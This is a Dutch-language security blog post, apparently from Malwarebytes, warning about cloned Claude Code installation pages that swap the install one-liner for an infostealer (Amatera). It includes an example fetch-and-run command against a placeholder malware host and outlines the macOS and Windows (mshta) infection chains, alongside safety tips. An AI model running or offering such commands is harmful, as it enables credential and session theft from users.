Aanvallers klonen installatiepagina's voor populaire tools zoals Claude Code en vervangen de 'one-liner'-installatiecommando's door malware, voornamelijk om wachtwoorden, cookies, sessies en toegang tot ontwikkelomgevingen te stelen.
Moderne installatiehandleidingen vragen je vaak om één enkele opdracht te kopiëren, zoals curl https://malware-site | bash in uw terminal en druk op Enter. Door deze gewoonte wordt de website een afstandsbediening: elk script dat op die URL staat, wordt uitgevoerd met uw rechten, vaak die van een beheerder.
Onderzoekers hebben ontdekt dat aanvallers misbruik maken van deze workflow door alles identiek te houden en alleen te veranderen waar die ene regel daadwerkelijk verbinding mee maakt. Voor veel niet-gespecialiseerde gebruikers die net zijn begonnen met het gebruik van AI en ontwikkelaarstools, voelt deze methode normaal aan, waardoor ze minder op hun hoede zijn.
Maar dit komt in feite neer op "Ik vertrouw dit domein" en dat is geen goed idee, tenzij je zeker weet dat het te vertrouwen is.
Het gaat meestal zo. Iemand zoekt op 'Claude Code installeren' of 'Claude Code CLI', ziet bovenaan een gesponsord resultaat met een geloofwaardige URL en klikt erop zonder er al te veel over na te denken.
Maar die advertentie leidt naar een gekloonde documentatie- of downloadpagina: hetzelfde logo, dezelfde zijbalk, dezelfde tekst en een bekende 'kopiëren'-knop naast de installatieopdracht. In veel gevallen leidt elke andere link waarop u op die nep-pagina klikt u stilletjes door naar de echte website van de leverancier, zodat er verder niets verdachts aan de hand lijkt.
Net als bij ClickFix-aanvallen wordt deze methode InstallFix genoemd. De gebruiker voert onder valse voorwendselen de code uit die zijn eigen computer infecteert, en de payload is meestal een infostealer.
De belangrijkste payload in deze InstallFix-cases met Claude Code-thema is een infostealer genaamd Amatera. Deze richt zich op browsergegevens zoals opgeslagen wachtwoorden, cookies, sessietokens, gegevens voor automatisch invullen en algemene systeeminformatie waarmee aanvallers een profiel van het apparaat kunnen opstellen. Hiermee kunnen ze websessies kapen en inloggen op clouddashboards en interne beheerpanelen zonder dat ze uw daadwerkelijke wachtwoord nodig hebben. Sommige rapporten maken ook melding van interesse in crypto-wallets en andere accounts met een hoge waarde.
Windows Mac
De op de Claude Code gebaseerde campagne die de onderzoekers ontdekten, was uitgerust om zowel Windows Mac te targeten.
Op macOS haalt de kwaadaardige oneliner meestal een script voor de tweede fase op van een domein dat door de aanvaller wordt beheerd. Dit script is vaak versleuteld met base64, zodat het op het eerste gezicht onduidelijk maar onschadelijk lijkt. Dat script downloadt en voert vervolgens een binair bestand uit van nog een ander domein, verwijdert de attributen en maakt het uitvoerbaar voordat het wordt gestart.
Op Windows is gezien dat het commando spawning veroorzaakt. cmd.exe, die vervolgens mshta.exe met een externe URL. Hierdoor kan de malware-logica worden uitgevoerd als een vertrouwd Microsoft-binair bestand in plaats van als een duidelijk willekeurig uitvoerbaar bestand. In beide gevallen verschijnt er niets spectaculairs op het scherm: u denkt dat u gewoon een tool hebt geïnstalleerd, terwijl de echte payload stilletjes op de achtergrond aan het werk gaat.
Hoe blijf ik veilig
Nu ClickFix en InstallFix welig tieren – en het er niet naar uitziet dat ze snel zullen verdwijnen – is het belangrijk om alert, voorzichtig en beschermd te zijn.
- Doe rustig aan.Haast u nietom instructies op een webpagina of prompt op te volgen, vooral als u wordt gevraagd om opdrachten op uw apparaat uit te voeren of code te kopiëren en te plakken. Analyseer wat de opdracht zal doen voordat u deze uitvoert.
- Voer geen opdrachten of scripts uit van onbetrouwbare bronnen.Voer nooitcode of opdrachten uit die u van websites, e-mails of berichten hebt gekopieerd, tenzij u de bron vertrouwt en het doel van de actie begrijpt. Controleer instructies onafhankelijk. Als een website u vraagt om een opdracht uit te voeren of een technische actie te ondernemen, raadpleeg dan eerst de officiële documentatie of neem contact op met de ondersteuning voordat u verdergaat.
- Beperk het gebruik van kopiëren en plakken voor opdrachten.Door opdrachten handmatigin te voeren in plaats van te kopiëren en te plakken, verkleint u het risico dat u onbewust schadelijke payloads uitvoert die in gekopieerde tekst zijn verborgen.
- Beveilig uw apparaten. Gebruikeen up-to-date, realtimeantimalware-oplossingmet een webbeveiligingscomponent.
- Leer meer over de steeds veranderende aanvalsmethoden.Als je begrijpt dat aanvallen uit onverwachte hoeken kunnen komen en steeds veranderen, blijf je alert. Blijf onze blog lezen!
Pro tip:Wist je dat de gratis Malwarebytes Browser Guard extensie wanneer een website iets naar je klembord probeert te kopiëren?
We rapporteren niet alleen over bedreigingen - we verwijderen ze ook
Cyberbeveiligingsrisico's mogen zich nooit verder verspreiden dan een krantenkop. Houd bedreigingen van uw apparaten door Malwarebytes vandaag nog te downloaden.
